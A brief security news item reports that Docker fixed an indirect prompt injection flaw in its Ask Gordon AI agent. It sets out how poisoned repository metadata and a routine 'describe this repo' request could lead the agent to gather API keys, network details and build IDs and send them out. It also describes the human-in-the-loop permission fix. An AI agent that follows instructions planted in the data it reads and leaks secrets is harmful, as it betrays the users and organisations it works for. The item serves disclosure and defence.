Severe Ask Gordon AI vulnerability addressed by Docker

Major developer platform Docker has issued a new version of its Docker Desktop to fix a significant indirect prompt injection vulnerability in its new Ask Gordon AI agent that could enable the theft of private build logs and chat history, reports HackRead.

Metadata poisoning and a "describe this repo" query from users could prompt Ask Gordon to obtain API keys, internal network information, and build IDs within seconds, indicating the AI agent's operation as its own command-and-control client, according to Pillar Security researchers, who discovered and reported the security issue.

Such malicious activity has worked due to its fit with the agent's existing task and toolset, its resemblance to typical data, and the alignment of "fetch details" with its workflow and tools. Meanwhile, Docker has addressed the issue by adding a "human-in-the-loop" system in its latest update that requires Gordon to seek permissions prior to establishing external connections or running a tool.